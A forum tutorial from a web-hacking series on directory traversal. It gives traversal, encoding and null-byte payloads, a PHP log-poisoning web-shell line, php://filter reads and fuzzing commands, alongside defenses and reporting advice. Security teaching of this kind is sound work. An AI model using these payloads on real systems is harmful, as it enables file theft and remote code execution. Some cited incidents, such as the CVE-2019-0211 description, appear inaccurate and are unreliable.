• Web Security
  • Web Hacking Series - Part 9: Directory Traversal – Escaping the Web Root Jail🔓📂🚀

  • rocky

    The Analyst
  • Edited

Hey guys, Rocky here! 🚪🔓

Welcome to Day 9 of the Daily Web Hacking series! So far, we’ve tackled authentication bypasses, file upload vulns, and XSS. Today, we’re diving into Part 9: Directory Traversal—the hack that lets you “escape” a website’s restricted folders and rummage through the server’s entire file system. Imagine breaking out of a prison cell only to find the warden’s secret file cabinet. Let’s get into it!

What is Directory Traversal?

Directory Traversal (aka Path Traversal) is a vulnerability that allows attackers to read, write, or execute files outside the web root directory (the folder where the website’s public files live). By manipulating file paths (e.g., ../../), hackers can:

  • Steal sensitive files (/etc/passwd, .env, backups).
  • Access source code or configuration files.
  • Plant malware or overwrite critical system files.

Why it’s dangerous:

How Directory Traversal Works

Web apps often use user-supplied input to load files (e.g., profile pictures, PDFs). If the app doesn’t sanitize input properly, attackers can inject path sequences like ../ to “escape” the web root.

Example:
A site loads user avatars via:

https://site.com/load?file=rocky.jpg  

An attacker changes file=rocky.jpg to:

file=../../../../etc/passwd  

Result: The server returns the /etc/passwd file, exposing system users!

Types of Directory Traversal

1. Basic Traversal

  • Use ../ (Unix) or ..\ (Windows) to climb directories.

  • Payload:

      ../../../../etc/passwd  

2. Encoded Traversal

  • Bypass filters with URL encoding, double encoding, or Unicode.
  • Payloads:
    • URL-encoded: ..%2F..%2Fetc%2Fpasswd
    • Double-encoded: ..%252F..%252Fetc%252Fpasswd

3. Null Byte Injection

  • Terminate the filename early to bypass appending extensions.

  • Payload:

      ../../etc/passwd%00.jpg  
    • The server processes passwd%00 as passwd, ignoring .jpg.

4. Absolute Path Abuse

  • Directly reference absolute paths (if allowed).

  • Payload:

      /etc/passwd  

Real-World Directory Traversal Disasters

  • Apache (2019): CVE-2019-0211 allowed traversal via PHP scripts.
  • WordPress (2017): Plugin flaw exposed wp-config.php files.
  • Tesla (2018): Misconfigured servers leaked vehicle telemetry.

Lesson: Even tech giants mess up.

Step-by-Step Exploitation

Goal: Steal the /etc/passwd file from a vulnerable photo-sharing site.

1. Find a Vulnerable Endpoint

  • Look for parameters like ?file=, ?page=, or ?load=.

  • Example URL:

      https://hacklivly.com/view?image=profile.jpg  

2. Test Basic Traversal

  • Modify the parameter:

      image=../../../../etc/passwd  
  • If the server returns the file, you’ve won!

3. Bypass Filters

  • If blocked, try encoding:

      image=..%2F..%2Fetc%2Fpasswd  
  • Or add a null byte:

      image=../../etc/passwd%00.jpg  

4. Escalate Access

  • Steal config files: .env, config.php, wp-config.php.
  • Execute code: If you can write files, upload a web shell.

Advanced Traversal Tactics

1. Writing Files

  • How: If the app lets you upload or modify files.

  • Payload:

      ../../var/www/html/shell.php  
  • Impact: Execute commands via https://site.com/shell.php.

2. Log Poisoning

  • Inject PHP into log files (e.g., access.log), then traverse to them:

      GET /<?php system($_GET['cmd']); ?>  
  • Trigger execution:

      https://site.com/view?file=../../var/log/apache2/access.log&cmd=id  

3. PHP Wrappers

  • Use php://filter to read encoded files:

      file=php://filter/convert.base64-encode/resource=../../etc/passwd  
  • Decode the Base64 output to get the file.

Tools for Directory Traversal

1. Burp Suite

  • Repeater: Test payloads manually.
  • Intruder: Brute-force common paths (/etc/passwd, .env).

2. DotDotPwn

  • Automated directory traversal tool:

      dotdotpwn -m http -h hacklivly.com -x /load?file=TRAVERSAL  

3. FFUF (Fuzz Faster U Fool)

  • Fuzz for exposed files:

      ffuf -w paths.txt -u https://hacklivly.com/view?file=FUZZ  

Defending Against Directory Traversal

For Developers

  1. Input Validation

    • Block ../, ..\, and absolute paths.

    • PHP Example:

           $file = basename($_GET['file']); // Strips path info  
  2. Whitelist Allowed Files

    • Use a mapping of allowed filenames:

           allowed_files = {"profile.jpg": "images/profile.jpg"}  
           file = allowed_files.get(request.args.get('file'), "default.jpg")  
  3. Use Platform-Safe Functions

    • Python: os.path.realpath() + check if path starts with web root.

    • Java: Path.normalize() + validate.

  4. Store Files Outside Web Root

    • Serve files via a secure proxy script.

For Admins

  1. File Permissions

    • Restrict read/write access to web directories.

         chmod 755 /var/www/html  
  2. Web Application Firewall (WAF)

    • Block requests with ../, etc/passwd, etc.

  3. Log Monitoring

    • Alert on repeated traversal attempts.

Practice Legally: Labs & Challenges

  1. DVWA (Damn Vulnerable Web App):
    • Practice traversal in the File Inclusion module.
  2. PortSwigger Labs:
  3. Hack The Box:
    • Machines like Traverxec focus on path traversal.

Ethical Hacking & Reporting

Never exploit traversal vulns without permission. If you find one:

  1. Document: Record steps to reproduce.
  2. Report: Use the site’s security contact or bug bounty program.
  3. Disclose: Wait for a fix before sharing publicly.

Final Thoughts

Directory traversal is the digital equivalent of picking a lock. It’s simple, silent, and shockingly effective. By validating inputs, hardening servers, and thinking like a hacker, you can slam the door on this attack.

Remember: The web’s security depends on you. Find flaws, fix them, and keep the internet safe—one ../ at a time.

Rocky out! ✌️

P.S. If you’re loving this series, share it with your crew! Let’s turn script kiddies into security guardians.

Discussion Question: What’s the wildest file you’ve accessed via traversal? I once found a database backup chilling in /var/backups. 😅 Spill your stories below! 👇